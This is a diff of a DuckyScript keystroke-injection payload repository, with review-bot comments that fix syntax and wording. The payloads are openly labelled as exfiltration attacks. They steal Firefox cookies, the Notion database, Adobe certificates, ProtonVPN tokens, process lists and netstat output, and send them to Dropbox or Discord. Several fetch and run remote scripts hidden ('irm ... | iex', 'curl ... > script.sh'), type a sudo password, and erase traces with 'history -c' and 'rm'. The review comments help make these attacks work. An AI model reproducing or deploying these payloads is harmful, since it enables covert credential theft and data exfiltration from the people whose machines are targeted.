STRING "
ENTER
STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
STRINGLN DROPBOX_FOLDER="/Exfiltration"
DELAY 500
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
ENTER
STRINGLN curl -X POST#DROPBOX_API_CONST--header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
REM #### REMOVE TRACES ####
STRINGLN rm "$FILE_PATH"
DELAY 500
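Review bot: `STRINGLN curl -X POST#DROPBOX_API_CONST--header "Authorization: Bearer $ACCESS_TOKEN" ...` is missing the space on both sides of `#DROPBOX_API_CONST`, so the method, URL and first header run together and curl cannot parse the command. Merging the old three `STRING` lines into one `STRINGLN` is the right move, but the line needs to read `curl -X POST #DROPBOX_API_CONST --header ...`, as the Logs payload's equivalent line does.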

View File

@ -1,13 +1,14 @@
REM ##################################################
REM # |
REM # Title : Exfiltrate Photos Through Shell |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##################################################
REM_BLOCK
##################################################
# #
# Title : Exfiltrate Photos Through Shell #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Linux #
# #
##################################################
END_REM
REM Requirements:
REM - Internet Connection
@ -17,49 +18,63 @@ REM - if you need to install 'fswebcam'
REM - for add the -x permission to the script.sh downloaded
REM REQUIRED - replace example.com with your script.sh link
DEFINE SCRIPT-SH-LINK example.com
DEFINE #SCRIPT-SH-LINK example.com
REM REQUIRED - sudo Password
DEFINE SUDO-PSWD example
DEFINE #SUDO-PSWD example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Permission ####
REM This section of sudo time depends by the computer power on which it runs.
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
STRING sudo su
ENTER
STRINGLN sudo su
DELAY 500
STRING SUDO-PSWD
ENTER
STRINGLN #SUDO-PSWD
REM DELAY Based On Computer Power
DELAY 5000
REM If you want to install the dependency of fswebcam you should decommend it.
REM STRING apt install fswebcam -y
REM ENTER
REM STRINGLN apt install fswebcam -y
REM DELAY Based On Internet Power
REM DELAY 5000
REM #### Script ####
STRING curl
STRING SCRIPT-SH-LINK
STRING > script.sh
ENTER
STRINGLN curl #SCRIPT-SH-LINK > script.sh
REM DELAY Based On Internet Power
DELAY 4000
STRING chmod +x script.sh
ENTER
STRINGLN chmod +x script.sh
DELAY 500
STRING nohup ./script.sh > /dev/null 2>&1 & exit
ENTER
STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit
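Review bot: two comments in this hunk need wording fixes: `REM If you want to install the dependency of fswebcam you should decommend it.` should read `uncomment`, and `REM - for add the -x permission to the script.sh downloaded` should read `- to add the -x permission to the downloaded script.sh`. Also `REM This section of sudo time depends by the computer power` should read `depends on`.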

View File

@ -1,73 +1,79 @@
REM ##########################################
REM # |
REM # Title : Exfiltrate Process Info |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##########################################
REM_BLOCK
##########################################
# #
# Title : Exfiltrate Process Info #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Linux #
# #
##########################################
END_REM
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
DELAY 1000
REM Set yout Dropbox folder name
DEFINE #DROPBOX_FOLDER_NAME example
REM This is just a Dropbox const, don't edit
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
REM #### GET PROCESS SECTION ####
STRING ps aux > process.txt
ENTER
STRINGLN ps aux > process.txt
DELAY 500
REM #### EXFILTRATE SECTION ####
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
STRINGLN USER_NAME=$(whoami)
DELAY 500
STRING TXT_PATH="/home/$USER_NAME/process.txt"
ENTER
STRINGLN TXT_PATH="/home/$USER_NAME/process.txt"
DELAY 500
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
STRING DROPBOX_FOLDER_NAME
STRING "
ENTER
STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
ENTER
STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
DELAY 2000
REM #### REMOVE TRACES ####
STRING history -c
ENTER
DELAY 500
STRING exit
ENTER
STRINGLN history -c; exit
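Review bot: `STRINGLN ACCESS_TOKEN="#TOKEN"` references a constant this version no longer defines: the old `DEFINE TOKEN example` is removed and no `DEFINE #TOKEN` was added next to the new `DEFINE #DROPBOX_FOLDER_NAME` / `DEFINE #DROPBOX_API_CONST` at the top, so the payload either fails to compile or types the literal text `#TOKEN` as the token. Add `DEFINE #TOKEN example` under the `REM Required: Set here your Dropbox access TOKEN` comment, or move that comment up into the configuration section. Two smaller things: `STRINGLN curl -X POST#DROPBOX_API_CONST --header ...` again lacks the space after `POST`, and the Requirements block says `REM - Discord Webhook` while the payload uploads to Dropbox; `REM Set yout Dropbox folder name` should read `your`.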

View File

@ -1,26 +1,66 @@
REM ##########################################
REM # |
REM # Title : Exfiltrate Process Info |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ##########################################
REM_BLOCK
##########################################
# #
# Title : Exfiltrate Process Info #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10-11 #
# #
##########################################
END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Webhook
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
DEFINE PAYLOAD example.com
DEFINE #PAYLOAD example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass irm
STRING PAYLOAD
STRING | iex
ENTER
STRINGLN powershell -w h -ep bypass irm #PAYLOAD | iex
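Review bot: the Requirements comment `REM - Dropbox Webhook` names something the visible payload does not use: it only fetches `#PAYLOAD` with `irm ... | iex`, and the Linux variant of this payload lists `Discord Webhook` while actually uploading to Dropbox, so the two requirement lines look swapped. State the service `ExfiltrateProcessInfo.ps1` actually posts to. Also `REM REQUIRED - Reply example.com with YOUR LINK` should read `Replace`.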

View File

@ -33,18 +33,12 @@ Open a PowerShell, the get dinamically the Notion full-path and then add the `no
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
<br>Linkedin
</td>
</tr>
</table>
</div>
</div>

View File

@ -1,26 +1,68 @@
REM #########################################################################
REM # |
REM # Title : Exfiltrates the entire database of the Notion client |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM #########################################################################
REM_BLOCK
#########################################################################
# #
# Title : Exfiltrates the entire database of the Notion client #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10-11 #
# #
#########################################################################
END_REM
REM Requirements:
REM - Notion must be installed
REM - Internet Connection
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRING PowerShell
ENTER
STRINGLN PowerShell
DELAY 2000
REM Settings about Notion DB

View File

@ -1,31 +1,69 @@
REM ####################################################
REM # |
REM # Title : Export Firefox Cookies Database |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ####################################################
REM_BLOCK
####################################################
# #
# Title : Export Firefox Cookies Database #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10-11 #
# #
####################################################
END_REM
REM Requirements:
REM - Firefox must be installed
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
DEFINE DROPBOX_ACCESS_TOKEN "example"
DEFINE #DROPBOX_ACCESS_TOKEN "example"
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
STRINGLN powershell
DELAY 2000
REM Get cookies DB path
STRINGLN
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
@ -33,14 +71,8 @@ STRINGLN
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
END_STRINGLN
$accessToken = #DROPBOX_ACCESS_TOKEN
REM Setting about exfiltration
STRING $accessToken =
STRING DROPBOX_ACCESS_TOKEN
ENTER
STRINGLN
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$dropboxFilePath = "/cookies_exported.sqlite"
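Review bot: the new line `$accessToken = #DROPBOX_ACCESS_TOKEN` sits after `END_STRINGLN` and outside any `STRINGLN` block, so the compiler reads it as DuckyScript rather than as text to type: `$accessToken` is not a declared DuckyScript VAR, and the PowerShell session never receives the assignment, leaving `$accessToken` undefined when the upload runs. Either prefix it (`STRINGLN $accessToken = #DROPBOX_ACCESS_TOKEN`) or move it to the top of the following `STRINGLN` block with `$uploadUrl`. The quoting in `DEFINE #DROPBOX_ACCESS_TOKEN "example"` is correct for this use, since the value is substituted into a PowerShell string literal; keep the REM telling the user to replace only the word inside the quotes.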

View File

@ -1,26 +1,68 @@
REM ####################################################################
REM # |
REM # Title : Export all saved certificates with Adobe Reader |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ####################################################################
REM_BLOCK
####################################################################
# #
# Title : Export all saved certificates with Adobe Reader #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10-11 #
# #
####################################################################
END_REM
REM Requirements:
REM - Adobe Reader must be installed
REM - Internet Connection
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRING PowerShell
STRINGLN PowerShell
DELAY 2000
REM Settings about Adobe Reader

View File

@ -1,20 +1,63 @@
REM ###########################################################
REM # |
REM # Title : Exports all the links of the downloads |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10/11 |
REM # |
REM ###########################################################
REM_BLOCK
###########################################################
# #
# Title : Exports all the links of the downloads #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10/11 #
# #
###########################################################
END_REM
REM Requirements:
REM - Firefox installed
REM You must define your Discord webhook if you want to use this method for the exfiltration
DEFINE DISCORD_WEBHOOK example
DEFINE #DISCORD_WEBHOOK example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Firefox
GUI
@ -49,9 +92,7 @@ DELAY 10000
STRINGLN "
REM Exfiltration using Discord Webhook
STRING $WebhookUrl = "
STRING DISCORD_WEBHOOK
STRINGLN "
STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"
STRINGLN $Payload = @{content = $DOWNLOADS} | ConvertTo-Json
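Review bot: the Requirements block lists only `REM - Firefox installed`, yet the payload exfiltrates over `$WebhookUrl = "#DISCORD_WEBHOOK"`, so it also needs an Internet connection and a Discord webhook; list both, as the other payloads in this change do. The merge of `STRING $WebhookUrl = "` / `STRING DISCORD_WEBHOOK` / `STRINGLN "` into one `STRINGLN` is correct.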

View File

@ -1,43 +1,83 @@
REM ###################################################################
REM # |
REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Credentials, Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################################
REM_BLOCK
###################################################################
# #
# Title : ProtonVPN-config-to-Discord-Exfiltration #
# Author : Aleff #
# Version : 1.0 #
# Category : Credentials, Exfiltration #
# Target : Windows 10-11 #
# #
###################################################################
REM Title: ProtonVPN-config-to-Discord-Exfiltration
REM Author: Aleff
REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
REM In the config file you can find a lot information about the user like:
REM - UserUid
REM - UserAccessToken
REM - UserRefreshToken
REM - UserAuthenticationPublicKey
REM - UserAuthenticationSecretKey
REM - UserAuthenticationCertificatePem
REM - UserCertificationServerPublicKey
REM - and so on...
REM Then it cleans up traces of what you have done after.
REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
REM Version: 1.0
REM Category: Credentials, Exfiltration
REM Requirements: ProtonVPN user logged at least one time and internet connection
REM
Title: ProtonVPN-config-to-Discord-Exfiltration
Author: Aleff
Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
In the config file you can find a lot information about the user like:
- UserUid
- UserAccessToken
- UserRefreshToken
- UserAuthenticationPublicKey
- UserAuthenticationSecretKey
- UserAuthenticationCertificatePem
- UserCertificationServerPublicKey
- and so on...
Then it cleans up traces of what you have done after.
Target: Windows 10-11 (PowerShell + ProtonVPN software)
Version: 1.0
Category: Credentials, Exfiltration
Requirements: ProtonVPN user logged at least one time and internet connection
END_REM
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
DEFINE #PAYLOAD example.com
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE WEBHOOK example.com
DEFINE #WEBHOOK example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass $discord='
STRING WEBHOOK
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
DEFINE PAYLOAD example.com
STRING ';irm PAYLOAD | iex
ENTER
STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';irm #PAYLOAD | iex
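Review bot: the new `REM_BLOCK` carries the metadata twice: the boxed header already gives Title, Author, Version and Category, and the description that follows repeats `Title:`, `Author:`, `Version:` and `Category:` with the same values; keep only Description, Target and Requirements below the box (the netstat payload in this change has the same duplication). Minor wording: `a lot information` should be `a lot of information`, and `REM Reply example.com with YOUR LINK` should read `Replace`.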

View File

@ -41,18 +41,12 @@ I used the [DETECT_READY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-re
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
<br>Linkedin
</td>
</tr>
</table>
</div>
</div>

View File

@ -1,12 +1,14 @@
REM ###########################################################
REM # |
REM # Title : Tree Structure Of The Operating System |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###########################################################
REM_BLOCK
###########################################################
# #
# Title : Tree Structure Of The Operating System #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10-11 #
# #
###########################################################
END_REM
REM Requirements:
REM - Internet connection
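Review bot: `REM Requirements:` / `REM - Internet connection` are left as bare REM lines after the new `REM_BLOCK ... END_REM`, while the other payloads in this diff move the Requirements list inside the block; pick one convention so the headers stay uniform across the repository.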

View File

@ -1,45 +1,84 @@
REM ###################################################################
REM # |
REM # Title : Windows-netstat-to-Discord-Exfiltration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Net, Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################################
REM_BLOCK
###################################################################
# #
# Title : Windows-netstat-to-Discord-Exfiltration #
# Author : Aleff #
# Version : 1.0 #
# Category : Net, Exfiltration #
# Target : Windows 10-11 #
# #
###################################################################
REM Title: Windows-netstat-to-Discord-Exfiltration
REM Author: Aleff
REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
REM Put 1 on the function that you want to active, else 0. Functions available:
REM - default (simple 'netstat' command)
REM - routing_table $r
REM - listening_canonical $lc
REM - listening_numerical $ln
REM - all_canonical $ac
REM - all_numerical $an
REM - offload ot
REM - proto $p "<protocol>"
REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
Title: Windows-netstat-to-Discord-Exfiltration
Author: Aleff
Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
Put 1 on the function that you want to active, else 0. Functions available:
- default (simple 'netstat' command)
- routing_table $r
- listening_canonical $lc
- listening_numerical $ln
- all_canonical $ac
- all_numerical $an
- offload ot
- proto $p "<protocol>"
- - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
REM Target: Windows 10-11 (PowerShell)
REM Version: 1.0
REM Category: Net, Exfiltration
REM Requirements: Internet connection
REM
Target: Windows 10-11 (PowerShell)
Version: 1.0
Category: Net, Exfiltration
Requirements: Internet connection
END_REM
REM REQUIRED - Provide your Discord WEBHOOK
DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE #WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
DEFINE #PAYLOAD example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass $discord='
STRING WEBHOOK
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
DEFINE PAYLOAD example.com
STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
ENTER
STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm #PAYLOAD | iex
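Review bot: The option list in the new REM_BLOCK still reads `- offload ot`, but the command typed at the end sets `$o='1'`; the line should say `- offload $o` so readers know which variable to toggle. The same list says to leave `$p=""` blank when no protocol filter is wanted, while the typed command hard-codes `$p='TCP'`; the documentation should point at that `STRINGLN` as the place to change it. The fold of `DEFINE WEBHOOK` into `DEFINE #WEBHOOK` and the removal of the mid-payload `DEFINE PAYLOAD example.com` in favour of the top-level `DEFINE #PAYLOAD` are correct.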

View File

